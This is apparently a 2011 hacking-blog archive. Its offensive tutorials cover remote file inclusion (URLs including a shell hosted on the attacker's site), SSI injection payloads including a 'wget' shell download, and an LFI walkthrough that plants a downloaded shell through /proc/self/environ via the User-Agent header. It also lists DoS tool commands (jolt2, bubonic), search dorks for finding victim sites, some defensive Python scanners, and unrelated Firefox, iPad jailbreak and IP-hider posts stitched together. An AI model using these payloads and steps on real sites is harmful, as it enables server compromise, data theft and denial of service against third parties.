
Archive for June 2011

[TuT] RFI - Remote File Inclusion.

What is RFI?
RFI (Remote File Inclusion) is now an uncommon vulnerability because most websites have been patched and updated, so you will be lucky to find a vulnerable site. Vulnerable websites still exist, however; many HackForums users keep dorks for searching for RFI-vulnerable sites, as well as lists of known-vulnerable sites. RFI is exactly what its name says: you include a file on the website from a remote location.

What makes a page vulnerable?
A PHP include script looks like this.



<?php
// Vulnerable: the file name comes straight from the query string and is included unchecked.
include($_GET['p']);
?>

Since the code uses 'p', the syntax would be:


http://victimsite.com/index.php?p=URL_TO_SHELL.txt?

If the script looks like this:


<?php
// The same flaw with a different parameter name.
include($_GET['lulz']);
?>

The syntax would then be:


http://victimsite.com/index.php?lulz=URL_TO_SHELL.txt?

Understood?

What can I accomplish with RFI?
You can include your PHP shells onto the website (GNYShell, C99, etc).
You can include just about any file onto the website.

How can I search for RFI vulnerable sites?
Using dorks, exploit scanners, etc.

Here is a list of RFI dorks:


Exploit scanners: http://www.youtube.com/v/f6SOzynrWx4

We've got our target, how do we exploit this vulnerability?
Testing for the vulnerability is essentially the same as exploiting it, so testing and finishing up happen in one step.
Go to the vulnerable website. For this demonstration I will use a made-up site.


http://victimsite.com/index.php?p=interview.php

As you can see above, a file name is passed to index.php; in this case it is "interview.php". Most of the time there will be a file name at the end of the URL like this one, because the script is including a file, and that is the value we replace.

Tweaking and exploiting.
So now we want to tweak this to our advantage. This is rather simple.

What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php).
You will need to upload it to any web host.
So once you have uploaded your shell to your website, it should look like this.


http://yoursite.com/shell.txt

Including our shell in the target's website.
Okay, once we are at the vulnerable page (http://victimsite.com/index.php?p=include.php) we want to replace "include.php" with our own file.
Our new link should look like this.


http://victimsite.com/index.php?p=http://yoursite.com/shell.txt?
The question mark (?) is important: anything the script appends to the parameter (for example a ".php" suffix) becomes part of the remote URL's query string instead of the file name. If the site is vulnerable you should now see your shell embedded in the webpage. You can then do as you wish with it.

Sometimes "shell.txt?" may not be enough and we need a null byte for it to execute successfully. If you receive an error from "shell.txt?", try "shell.txt?%00" (in older PHP versions the %00 null byte terminates the string, discarding anything appended after it).

I hope this helps. Happy hacking. Credit Goes To PHIZO

SSI (Server Side Inclusion)

1- What is It?

A Server Side Include attack is an extremely useful attack for executing commands on the server. To use it you need basic knowledge of Bash or Batch, so you know which commands could help compromise the server.

2- What Sites are Vulnerable?

For a site to be vulnerable to SSI injection, Server Side Includes must be allowed in the Apache config file, or the file extension must be '.shtml', '.shtm' or '.stm'. Apache, lighttpd and IIS all support SSI.

3- Testing for SSI Injection

To audit a site for SSI injection, search all the directories for '.shtml', '.shtm' or '.stm' extensions. If you find any, SSI is probably enabled; if you don't find any, it may still be enabled. It affects pages with unsanitized requests (e.g. no filters, nothing filtering <!--#exec ... -->). To test, enter the following command into the request:

<!--#exec cmd="ls" -->

If a filesystem listing appears, the site is vulnerable; if the server is Windows, replace 'ls' with 'dir'.
You test for SSI the same way as for XSS; you can put the command into:
- Textboxes/search boxes
- Headers
- Cookies
- Address Bar

4- Useful Commands

-Show Files Linux

<!--#exec cmd="ls" -->

-Show Files Windows

<!--#exec cmd="dir" -->

-Read /etc/passwd



-What User Is the webserver running on

<!--#exec cmd="whoami" -->

-Download a shell to the server to get full control

<!--#exec cmd="wget shell.php" -->

5- Dorks

Similar to SQLi dorks, these return a list of sites that may or may not be vulnerable to SSI injection:
inurl:index.shtml
inurl:index.shtm
inurl:index.stm
Those are a few to start you off, but it is easy as pie to think of your own.
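The following Python is an added example, not part of the original tutorial: it checks the four input channels listed above (query parameters, headers, cookies, form fields) for SSI directives, shows that HTML-escaping input before it is written into an SSI-parsed page neutralizes them, and reads an Apache Options line to tell whether #exec would be honoured (IncludesNOEXEC keeps SSI enabled but disables #exec cmd). The sample request is constructed for the example.

```python
import html
import re

# Matches an SSI directive such as <!--#exec cmd="ls" --> and captures its name.
# Whitespace inside the markers is tolerated so sloppy variants are still caught.
SSI_DIRECTIVE_RE = re.compile(r"<!--\s*#\s*([a-z]+)\b.*?-->", re.IGNORECASE | re.DOTALL)


def find_ssi_directives(text):
    """Return the lower-cased directive names (exec, include, echo, ...) found in text."""
    return [m.group(1).lower() for m in SSI_DIRECTIVE_RE.finditer(text)]


def scan_request(request):
    """Inspect every channel the tutorial lists: query string, headers,
    cookies and form fields. request is a plain dict of dicts.
    Returns a list of (channel, name, directive) findings."""
    findings = []
    for channel in ("query", "headers", "cookies", "form"):
        for name, value in request.get(channel, {}).items():
            for directive in find_ssi_directives(value):
                findings.append((channel, name, directive))
    return findings


def neutralize(value):
    """Encode user input before it lands in an SSI-parsed page. mod_include
    only acts on a literal '<!--#' sequence, so escaping '<' and '>' leaves
    nothing for it to execute."""
    return html.escape(value, quote=True)


def ssi_exec_allowed(options_line):
    """Read an Apache 'Options' directive line and report whether #exec would
    run: 'Includes' (or 'All') enables it, 'IncludesNOEXEC' keeps SSI but
    disables exec. Simplified: a '-' prefix removes a flag, '+' or none adds it."""
    tokens = options_line.split()[1:]
    flags = {t.lstrip("+").lower() for t in tokens if not t.startswith("-")}
    if "includesnoexec" in flags:
        return False
    return "includes" in flags or "all" in flags


# Constructed sample request: one directive in the search box, one in a header.
SAMPLE_REQUEST = {
    "query": {"q": 'shoes<!--#exec cmd="ls" -->'},
    "headers": {"User-Agent": "Mozilla/5.0", "Referer": '<!--#exec cmd="whoami" -->'},
    "cookies": {"session": "abc123"},
    "form": {"comment": "just a normal comment"},
}

if __name__ == "__main__":
    for channel, name, directive in scan_request(SAMPLE_REQUEST):
        print(f"SSI #{directive} directive found in {channel}[{name}]")
    print(neutralize(SAMPLE_REQUEST["query"]["q"]))
```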

LFI (Local File Inclusion) Tutorial: /proc/self/environ

1 – Introduction

In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and injecting malicious code into /proc/self/environ. It is a step-by-step tutorial.

2 – Finding LFI

- Now we are going to find a website vulnerable to Local File Inclusion. So we have found our target; let's check it.



www.website.com/view.php?page=contact.php

- Now let's replace contact.php with ../ so the URL becomes


www.website.com/view.php?page=../

and we get an error

Code:
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so there is a good chance of a Local File Inclusion vulnerability. Let's go to the next step.

- Now let's check for /etc/passwd to see whether it is vulnerable to Local File Inclusion. Let's make a request:


www.website.com/view.php?page=../../../etc/passwd

we get an error and no /etc/passwd file


Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

so we go up more directories


www.website.com/view.php?page=../../../../../etc/passwd

we successfully included the /etc/passwd file.


root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin

3 – Checking whether /proc/self/environ is accessible

- Now let's see if /proc/self/environ is accessible. We replace etc/passwd with proc/self/environ


www.website.com/view.php?page=../../../../../proc/self/environ

If you get something like


DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

/proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not accessible or the OS is FreeBSD.

4 – Injecting malicious code

- Now let's inject our malicious code into /proc/self/environ. How can we do that? We can inject our code through the User-Agent HTTP header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and request the URL:


www.website.com/view.php?page=../../../../../proc/self/environ

Choose Tamper and in the User-Agent field write the following code:


{The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread}

Then submit the request.

Our command will be executed through system() (it will download the txt shell from http://hack-bay.com/Shells/gny.txt {The Unknown: the link of the shell used has expired, use the Link I posted at the end of this Thread} and save it as shell.php in the website directory), and our shell will be created. If it doesn't work, try exec(), because system() can be disabled on the webserver from php.ini.

5 – Access our shell

- Now let's check whether our malicious code was successfully injected. Let's check if the shell is present.


www.website.com/shell.php

Our shell is there. The injection was successful.
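As an added example (not part of either tutorial), the following Python shows how a defender classifies the include-parameter values seen in the RFI section above and in this LFI walkthrough: it resolves a value the way include() would against the script directory quoted in the warning above, flags remote URLs, NUL bytes and directory traversal, and scans constructed access-log lines for the same patterns. The base directory is taken from the warning on this page; the log lines are constructed from the requests shown.

```python
import posixpath
import re
from urllib.parse import parse_qs, urlsplit

# Directory the vulnerable view.php includes from, taken from the warning
# quoted above; a real deployment would use the script's own directory.
BASE_DIR = "/home/sirgod/public_html/website.com"

# URL schemes PHP's include() will fetch when remote includes are enabled.
REMOTE_SCHEMES = {"http", "https", "ftp"}


def classify_include(value, base_dir=BASE_DIR):
    """Classify one already-decoded include-parameter value.

    Returns (verdict, resolved_path):
      'remote'    - a URL to another host (the RFI case)
      'null-byte' - contains a NUL, the %00 truncation trick
      'traversal' - resolves outside base_dir (the LFI case)
      'local'     - stays inside base_dir, the only kind that may be included
    """
    if "\x00" in value:
        return "null-byte", None
    parts = urlsplit(value)
    if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
        return "remote", value
    # Resolve the path the way include() would, relative to the script directory;
    # normpath collapses the ../ steps, so too many of them simply stop at "/".
    resolved = posixpath.normpath(posixpath.join(base_dir, value))
    if resolved == base_dir or resolved.startswith(base_dir + "/"):
        return "local", resolved
    return "traversal", resolved


def safe_include_path(value, base_dir=BASE_DIR):
    """Hardened replacement for include($_GET['page']): return the resolved
    path only when it stays inside base_dir, otherwise None."""
    verdict, resolved = classify_include(value, base_dir)
    return resolved if verdict == "local" else None


# Apache combined-log prefix up to the request target: ip - - [time] "GET /path?q HTTP/1.1"
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def scan_access_log(lines, base_dir=BASE_DIR):
    """Return (client_ip, parameter, verdict) for every query-string value
    that is not a plain local file name."""
    findings = []
    for line in lines:
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client_ip, target = match.groups()
        query = urlsplit(target).query
        # parse_qs percent-decodes, so a logged %00 becomes a real NUL here.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                verdict, _ = classify_include(value, base_dir)
                if verdict != "local":
                    findings.append((client_ip, param, verdict))
    return findings


# Constructed sample log lines mirroring the requests shown in both tutorials.
SAMPLE_LOG = [
    '203.0.113.10 - - [01/Jun/2011:10:00:00 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 1024',
    '203.0.113.11 - - [01/Jun/2011:10:00:01 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 2048',
    '203.0.113.11 - - [01/Jun/2011:10:00:02 +0000] "GET /view.php?page=../../../../../proc/self/environ HTTP/1.1" 200 3072',
    '203.0.113.12 - - [01/Jun/2011:10:00:03 +0000] "GET /index.php?p=http://yoursite.com/shell.txt? HTTP/1.1" 200 4096',
    '203.0.113.12 - - [01/Jun/2011:10:00:04 +0000] "GET /index.php?p=http://yoursite.com/shell.txt?%00 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, param, verdict in scan_access_log(SAMPLE_LOG):
        print(f"{ip} {param}: {verdict}")
```

The three-level traversal from the walkthrough resolves to /home/etc/passwd, which is why that request failed, while five levels collapse to /etc/passwd.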

DoS Attacks and Hacking Tools

Hacking Tool: SSPing
  • SSPing is a DoS tool.
  • SSPing program sends the victim’s computer a series of highly fragmented, oversized ICMP data packets.
  • The computer receiving the data packets locks up when it tries to put the fragments together.
  • The result is a memory overflow which in turn causes the machine to stop responding.
  • Affects Win 95/NT and Mac OS
SSPING is a program that can freeze any computer connected to the Internet or on a network running Windows 95, Windows NT, and older versions of the Mac OS that are not behind a firewall that blocks ICMP (Internet Control Message Protocol) data packets. The SSPING program sends the victim’s computer a series of highly fragmented, oversized ICMP data packets over the connection. The computer receiving the data packets locks when it tries to put the fragments together. Usually, the attacker only needs to send a few packets, locking the victim’s computer instantaneously. When the victim restarts his or her computer, the connection with the attacker is lost and the attacker remains anonymous.
Jolt is a program which effectively freezes some Windows 95 or Windows NT machines. It is based on old code which freezes old SysV and POSIX implementations. Jolt works by sending a series of spoofed, highly fragmented ICMP packets to the target, which then tries to reassemble the received fragments. As a result of Jolt, Windows 95/NT ceases to function altogether.
This will affect unpatched Windows 95, Memphis and Windows NT machines, which are not behind a firewall that blocks ICMP packets. This will also affect old MacOS machines, and it is possible it is also useful against old SysV/POSIX implementations.
Hacking Tool: Land Exploit
  • Land Exploit is a DoS attack in which a program sends a TCP SYN packet where the target and source addresses are the same and port numbers are the same.
  • When an attacker wants to attack a machine using the land exploit, he sends a packet in which the source/destination ports are the same.
  • Most machines will crash or hang because they do not know how to handle it.
The Land Exploit Denial of Service attack works by sending a spoofed packet with the SYN flag – used in a “handshake” between a client and a host – set from a host to any port that is open and listening. If the packet is programmed to have the same destination and source IP address, when it is sent to a machine, via IP spoofing, the transmission can fool the machine into thinking it is sending itself a message, which, depending on the operating system, will crash the machine.
After receiving spoofed connection request (SYN) packets over TCP/IP, a computer running Windows 95 or Windows NT may begin to operate slowly. After about one minute, Windows returns to normal operation. Variations of this attack can cause any Windows PC to stop responding. (hang)
This behavior occurs due to “Land Attack.” Land Attack sends SYN packets with the same source and destination IP addresses and the same source and destination ports to a host computer. This makes it appear as if the host computer sent the packets to itself. Windows 95 and Windows NT operate slowly while the host computer tries to respond to itself.
Hacking Tool: Smurf
  • Smurf is a DoS attack involving forged ICMP packets sent to a broadcast address.
  • Attackers spoof the source address on ICMP echo requests and send them to an IP broadcast address. This causes every machine on the broadcast network to receive the request and reply to the source address forged by the attacker.
    1. An attacker sends an ICMP packet with a forged source address and the broadcast address as the destination.
    2. All the machines on the segment receive the broadcast and reply to the forged source address.
    3. This results in DoS due to high network traffic.
Smurf is a simple yet effective DDoS attack technique that takes advantage of the ICMP (Internet Control Message Protocol). ICMP is normally used on the internet for error handling and for passing control messages. One of its capabilities is to contact a host to see if it is “up” by sending an “echo request” packet. The common “ping” program uses this functionality. Smurf is installed on a computer using a stolen account, and then continuously “pings” one or more networks of computers using a forged source address. This causes all the computers to respond to a different computer than actually sent the packet. The forged source address, which is the actual target of the attack, is then overwhelmed by response traffic. The computer networks that respond to the forged (“spoofed”) packet serve as unwitting accomplices to the attack.
The “smurf” attack, named after its exploit program, is one in the category of network-level attacks against hosts. A perpetrator sends a large amount of ICMP echo (ping) traffic at IP broadcast addresses, all of it having a spoofed source address of a victim. If the routing device delivering traffic to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the ICMP echo request and reply to it with an echo reply each, multiplying the traffic by the number of hosts responding. On a multi-access broadcast network, there could potentially be hundreds of machines to reply to each packet.
The “smurf” attack’s cousin is called “fraggle”, which uses UDP echo packets in the same fashion as the ICMP echo packets; it was a simple re-write of “smurf”. There are two parties who are hurt by this attack… the intermediary (broadcast) devices–let’s call them “amplifiers”, and the spoofed address target, or the “victim”. The victim is the target of a large amount of traffic that the amplifiers generate.
Let's look at a scenario to see the nature of this attack. Assume a co-location switched network with 250 hosts, and that the attacker has a T1. The attacker sends, say, a 234 kb/s stream of ICMP echo (ping) packets, with a spoofed source address of the victim, to the broadcast address of the "bounce site". These ping packets hit the bounce site's broadcast network of 250 hosts; each of them takes the packet and responds to it, creating 250 ping replies outbound. If you multiply the bandwidth, 58.5 Mbps is used outbound from the "bounce site" after the traffic is multiplied. This is then sent to the victim (the spoofed source of the originating packets). The perpetrators of these attacks rely on the ability to send spoofed packets to the "amplifiers" in order to generate the traffic which causes the denial of service.
In the case of the smurf or fraggle attack, each host which supports this behavior on a broadcast LAN will happily reply with an ICMP or UDP (smurf or fraggle, respectively) echo-reply packet toward the spoofed source address, the victim. The amount of bandwidth and packets per second (pps) that can be generated by this attack is quite large. Many hosts cannot process this many packets per second; many hosts are connected to 10 Mbps Ethernet LANs where more traffic than wire speed is sent. Therefore, the ability to drop these packets at the network border, or even before it flows down the ingress pipes, is desired.
SYN Flood
  • SYN attack floods a targeted system with a series of SYN packets.
  • Each packet causes the targeted system to issue a SYN-ACK response; while the targeted system waits for the ACK that follows the SYN-ACK, it queues all outstanding SYN-ACK responses on what is known as the backlog queue.
  • SYN-ACKs are removed from the queue only when an ACK comes back or when an internal timer (set to a relatively long interval) terminates the TCP three-way handshake.
  • Once the queue is full, the system will ignore all incoming SYN requests, making the system unavailable for legitimate users.

Concept: The connectionless TCP attack does not complete the three-way handshake initiated by the originator, so the packet is often crafted with a nonexistent (spoofed) source IP. A connectionless TCP attack is more difficult to filter because the source address is not necessarily the true source IP of the packet. When the host fails to reach the source IP, it waits until the connection times out. The most effective way of stopping such attacks is rate limiting: setting a threshold on the number of packets the computer will accept for processing.

Concept: One of the most common alerts on many Intrusion Detection Systems is the TCP SYN flood alert. TCP SYN flood attacks are carried out by crafting packets from spoofed or non-existent source addresses and generating a high number of half-open connections. Because each connection opened must be processed to completion (the handshake finishes or it eventually times out), the system is pinned down performing these tasks. This problem is inherent in any network or operating system running a full TCP/IP implementation and is not easily rectified.

Countermeasure: Network ingress filtering can also prevent downstream networks from injecting packets with faked or "spoofed" addresses into the Internet. Although it may not stop the attack, it makes identifying the source host easier so the attack can be terminated quickly. RFC 2267 [1] provides more information on ingress filtering.
In TCP/IP, a three-way handshake takes place when a service is connected to. First the client sends a SYN packet, to which the service responds with a SYN-ACK. Finally, the client responds to the SYN-ACK and the conversation is considered started.
A SYN flood attack is when the client does not respond to the SYN-ACK, tying up the service until it times out, and keeps sending SYN packets. The source address of the client is forged to a non-existent host, and as long as SYN packets arrive faster than the waiting TCP stack's timeout clears them, the resources of the service stay tied up.
This is a simplified version of what exactly happens. During a SYN flood attack, the attacker sends a large number of SYN packets alone, without the corresponding ACK packet response to the victim’s SYN/ACK packets. The victim’s connections table rapidly fills with incomplete connections, crowding out the legitimate traffic. Because the rate of attacking SYN packets usually far exceeds that of normal traffic, even when a table entry eventually is cleared out, another attacking SYN packet rather than a legitimate connection will fill it.
But because SYN packets are a necessary part of legitimate traffic, they cannot be filtered out altogether. Second, SYN packets are relatively small, so an attacker can send large numbers of packets using relatively low-bandwidth Internet connections. Finally, because the attacker does not need to receive any data from the victim, the attacker can place random source IP addresses in the attacking packets to camouflage the actual source of the attack, and make filtering all but impossible.
The basic purpose of a SYN flood is to use up all new network connections at a site and thus prevent legitimate users from connecting. TCP connections are made by first sending a request to connect with an ID in it. The receiving system sends out an acknowledgment saying it's ready, and then the sending system is supposed to acknowledge that the connection has been made. The SYN (Synchronize Sequence Number) packet is the first of these and contains the ID the receiver is supposed to reply to. If a fake ID is in that packet, the receiving system never gets a connection acknowledgment. Eventually the connection times out and that incoming channel on the receiver becomes available again for another request. A SYN flood sends so many such requests that all incoming connections are continuously tied up waiting for acknowledgments that never come. This makes the server generally unavailable to legitimate users (unless one happens to sneak in just as one of the tied-up connections times out).
Hacking Tool: WinNuke
  • WinNuke works by sending a packet with “Out of band” data to port 139 of the target host. First off, port 139 is the NetBIOS port and does not accept packets unless the flag OOB is set in incoming packet.
  • OOB stands for Out Of Band. When the victim's machine accepts this packet, the computer crashes with a blue screen.
  • Because the program accepting the packets does not know how to appropriately handle Out Of Band data, it crashes.
A “blue bomb” (also known as “WinNuke”) is a technique for causing the Windows operating system of someone you are communicating with to crash or suddenly terminate. The “blue bomb” is actually an out-of-band network packet containing information that the operating system cannot process. This condition causes the operating system to “crash” or terminate prematurely. The operating system can usually be restarted without any permanent damage other than possible loss of unsaved data when you crashed.
The blue bomb derives its name from the effect it sometimes causes on the display as the operating system is terminating – a white-on-blue error screen that is commonly known as blue screen of death. Blue bombs are sometimes sent by multi-player game participants who are about to lose or users of Internet Relay Chat (IRC) who are making a final comment. This is known as “nuking” someone. A commonly used program for causing the blue bomb is WinNuke. Many Internet service providers are filtering out the packets so they do not reach users.
The WinNuke attack sends OOB (Out-of-Band) data to an IP address of a Windows machine connected to a network and/or Internet. Usually, the WinNuke program connects via port 139, but other ports are vulnerable if they are open. When a Windows machine receives the out-of-band data, it is unable to handle it and exhibits odd behavior, ranging from a lost Internet connection to a system crash (resulting in the infamous Blue Screen of Death).
WinNuke is an outdated attack; all current Windows versions are immune to it.
Hacking Tool: Jolt2
  • Jolt2 enables users across different networks to send IP fragment-driven denial of service attacks against NT/2000 by making the victim’s machine utilize 100% of its CPU when it attempts to process the illegal packets.
    c:\> jolt2 1.2.3.4 -p 80 4.5.6.7
  • The above command launches the attack from the attacker’s machine with a spoofed IP address of 1.2.3.4 against the IP address 4.5.6.7.
  • The victim’s machine CPU resources reach 100%, causing the machine to lock up.
Sending large numbers of identical fragmented IP packets to a Windows 2000 or NT4 host may cause the target to lock up for the duration of the attack. CPU utilization on the target goes to 100% for the duration of the attack, which causes both the UI and the network interfaces to lock up.
Hacking Tool: Bubonic.c
  • Bubonic.c is a DoS exploit that can be run against Windows 2000 machines.
  • It works by sending TCP packets with random settings, with the goal of increasing the load on the machine so that it eventually crashes.
    c:\> bubonic 12.23.23.2 10.0.0.1 100
Bubonic.c is a denial of service program written against Windows 2000 machines; it has also been noted to work against certain versions of Linux. The denial of service works by sending TCP packets with random settings. This in turn drives the load up, causing the box to crash with error code: STOP 0x00000041 (0x00001000, 0x00001279, 0x000042A, 0x00000001) MUST_SUCCEED_POOL_EMPTY
Hacking Tool: Targa
  • Targa is a program that can be used to run 8 different Denial Of Service attacks.
  • The attacker has the option to either launch individual attacks or to try all the attacks until it is successful.
  • Targa is a very powerful program and can do a lot of damage to a company’s network.
Targa, written by a German hacker known as Mixter, combines several tools specifically devised to attack machines that run Microsoft Windows. The potency of these tools can be increased further by using them to attack a target machine from several compromised computers at once. However, this requires the attacker to log on to each computer in turn to initiate the attack.
Targa is a free software package available on the Internet. Targa contains many of the most well-known protocol- or operating-system-based DoS attacks. The attacker must be logged in with root permissions, since most of the attacks use IP spoofing, which requires root privileges. The attack can be done from any machine on which the targa.c code compiles. Mainly, the Targa package is intended to be used on Linux or BSD Unix computers. Target platforms can be any operating system; however, the attacks do not have an impact on all operating systems.
The attacks that can be done with the Targa kit:
  • Jolt by Jeff W. Roberson (modified by Mixter for overdrop effect) – discussed separately
  • Land by m3lt – discussed separately
  • Winnuke by _eci – discussed separately
  • Nestea by humble and ttol – Nestea exploits the “off by one IP header” bug in the Linux IP packet fragmentation code. Nestea crashes Linux 2.0.33 and earlier and some Windows versions. A new and improved version of the Nestea Linux IP fragmentation exploit is available.
  • Syndrop by PineKoan – Syndrop is a mixture of Teardrop and a TCP SYN flooding attack. Affected platforms are Linux and Windows 95/NT.
  • Teardrop by route|daemon9 – This type of denial of service attack exploits the way the Internet Protocol (IP) requires a packet that is too large for the next router to handle to be divided into fragments. Each fragment carries an offset from the beginning of the original packet that lets the receiving system reassemble the whole packet. In the teardrop attack, the attacker puts a confusing offset value in the second or later fragment. If the receiving operating system does not have a plan for this situation, it can cause the system to crash. This bug has not been shown to cause any significant damage to systems, and a simple reboot is the preferred remedy. However, though non-destructive, it could cause problems if you have unsaved data in an open application when you are attacked, causing you to lose that data. There are fixes against Teardrop.
  • Bonk by route|daemon9 & klepto – Bonk is based on teardrop.c. Bonk crashes Windows 95 and NT operating systems. Boink is an improved version of bonk.c. Boink allows UDP port ranges and can possibly crash a patched Windows 95/NT machine. NewTear is another variant of teardrop.c, which is slightly different from bonk.c. Mainly they do the same thing, just in different ways; small changes in the code may produce significantly different results.
  • NewTear by route|daemon9 – NewTear is another variant of teardrop.c.
    12 Tricks to Increase Firefox Speed 10 Times

    11 tricks to increase Firefox browsing and general speed 10 to 30 times. These are 100% tested hacks that improve the browsing speed of Firefox at least 10 times. These tricks are the latest tweaks found by several computer experts, including me. These are doonstuntsmania special tricks that boost your Mozilla Firefox browsing speed by 10-30 times.
    11 Tricks to Increase Firefox Speed
    1. Type about:config in the address bar and then press Enter.
     
    2. In the filter search bar type network.http.pipelining. Make sure the value field is set to true; if not, double-click it to set it to true. HTTP is the application-layer protocol that most web pages are transferred with. In HTTP 1.1, multiple requests can be sent before any responses are received. This is known as pipelining. Pipelining reduces page loading times, but not all servers support it.

    3. Go back to the filter search bar and type network.http.pipelining.maxrequests. Double-click this option and set its value to 8.

    4. In the filter search bar, type network.http.proxy.pipelining. Double-click it and set it to true.
     
    5. In IPv6-capable DNS servers, an IPv4 address may be returned when an IPv6 address is requested. It is possible for Mozilla to recover from this misinformation, but a significant delay is introduced.
    Type network.dns.disableIPv6 in the filter search bar and set this option to true by double clicking on it.
     
    6. CONTENT INTERRUPT PARSING
    This preference controls if the application will interrupt parsing a page to respond to UI events. It does not exist by default. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Boolean from the pop-up menu. Then:
    A. Enter content.interrupt.parsing in the New boolean value pop-up window and click OK
    B. When prompted to choose the value for the new boolean, select true and click OK.
     
    7. Rather than wait until a page has completely downloaded to display it to the user, Mozilla applications will regularly render what has been received to that point. This option controls the maximum amount of time the application will be unresponsive while rendering pages. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
    A. Enter content.max.tokenizing.time in the New integer value pop-up window and click OK
    B. You will be prompted to enter a value. Enter 2250000 and click OK.
     
    8. CONTENT NOTIFY INTERVAL
    This option sets the minimum amount of time to wait between reflows. Right-click (Apple users ctrl-click) anywhere in the about:config window, select New and then Integer from the pop-up menu.
    A. Type content.notify.interval in the New integer value pop-up window and click OK.
    B. You will be prompted to enter a value. Enter 750000 and click OK.
    9. CONTENT NOTIFY ON TIMER
    This option sets whether to reflow pages at an interval any higher than that specified by content.notify.interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Boolean from the pop-up menu.
    A. Type content.notify.ontimer in the New boolean value pop-up window and click OK.
    B. You will be prompted to choose the value for the new boolean. Select true and click OK.
     
    10. CONTENT NOTIFY BACKOFFCOUNT
    This option controls the maximum number of times the content will do timer-based reflows. After this number has been reached, the page will only reflow once it is finished downloading. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
    A. Enter content.notify.backoffcount in the New integer value pop-up window and click OK.
    B. You will be prompted to enter a value. Enter 5 and click OK.
     
    11. CONTENT SWITCH THRESHOLD
    You can interact with a loading page when content.interrupt.parsing is set to true. While a page is loading, the application has two modes: a high-frequency interrupt mode and a low-frequency interrupt mode. The first interrupts the parser more often to allow for greater UI responsiveness during page load.
    The low-frequency interrupt mode interrupts the parser less often to allow for quicker page load. The application enters high-frequency interrupt mode when you move the mouse or type on the keyboard and switches back to low-frequency mode after there has been no activity for a certain amount of time. This preference controls that amount of time. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
    A. Enter content.switch.threshold in the New integer value pop-up window and click OK.
    B. You will be prompted to enter a value. Enter 750000 and click OK.
     
    12. NGLAYOUT INITIALPAINT DELAY
    Mozilla applications render web pages incrementally: they display what has been received of a page before the entire page has been downloaded. Since the start of a web page normally does not have much useful information to display, Mozilla applications wait a short interval before first rendering a page. This preference controls that interval. Right-click (Apple users ctrl-click) anywhere in the about:config window and select New and then Integer from the pop-up menu.
    A. Enter nglayout.initialpaint.delay in the New integer value pop-up window and click OK.
    B. You will be prompted to enter a value. Enter 0 and click OK.

    Jailbreak Your IPad

    How To Jailbreak The iPad Using JailbreakMe


    These are instructions on how to jailbreak the iPad using JailbreakMe.
    Step One
    Launch Safari from your Springboard.

    Step Two
    Tap the address bar, enter http://jailbreakme.com, then press the Done button.

    Step Three
    To begin the jailbreak, simply move the slider to the right.

    Step Four
    A status bar is displayed as the download progresses.

    Step Five
    Once the download is complete, the jailbreak process will begin.

    Step Six
    Once you are notified that the jailbreak process is complete press the OK button.

    Press the Home button to reveal Cydia on your desktop!

    Congratulations you are done!

    Download Auto Hide IP V.5.1.7.2 Full

    Auto Hide IP - Hide Your IP Address, Surf Anonymously, Protect Your Identity, Guard Against Hackers.
